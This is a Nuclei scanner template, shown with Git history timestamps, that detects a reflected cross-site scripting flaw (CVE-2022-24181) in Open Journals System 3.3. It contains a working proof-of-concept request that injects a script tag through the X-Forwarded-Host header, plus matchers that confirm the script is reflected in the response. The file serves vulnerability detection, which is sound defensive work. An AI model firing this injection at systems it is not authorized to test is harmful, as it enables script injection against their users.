nuclei-templates/cves/2022/CVE-2022-24181.yaml

43 lines
1.1 KiB
YAML
Raw Normal View History

2022-07-08 15:51:34 +00:00
id: CVE-2022-24181
info:
name: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
author: lucasljm2001,ekrause
severity: medium
description: |
Detects an XSS vulnerability in Open Journals System.
reference:
- https://www.exploit-db.com/exploits/50881
2022-07-09 20:19:08 +00:00
- https://github.com/pkp/pkp-lib/issues/7649
2022-07-08 15:51:34 +00:00
- https://youtu.be/v8-9evO2oVg
2022-07-09 20:19:08 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24181
- https://nvd.nist.gov/vuln/detail/cve-2022-24181
2022-07-08 15:51:34 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-24181
2022-07-09 20:19:08 +00:00
tags: cve,cve2022,xss,oss,pkp-lib
2022-07-08 15:51:34 +00:00
requests:
- raw:
- |
2022-07-09 20:19:08 +00:00
GET /iupjournals/index.php HTTP/2
Host: {{Hostname}}
X-Forwarded-Host: foo"></script><script>alert(document.domain)</script><x=".com
2022-07-08 15:51:34 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-07-09 20:19:08 +00:00
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
2022-07-08 15:51:34 +00:00
- type: status
status:
- 200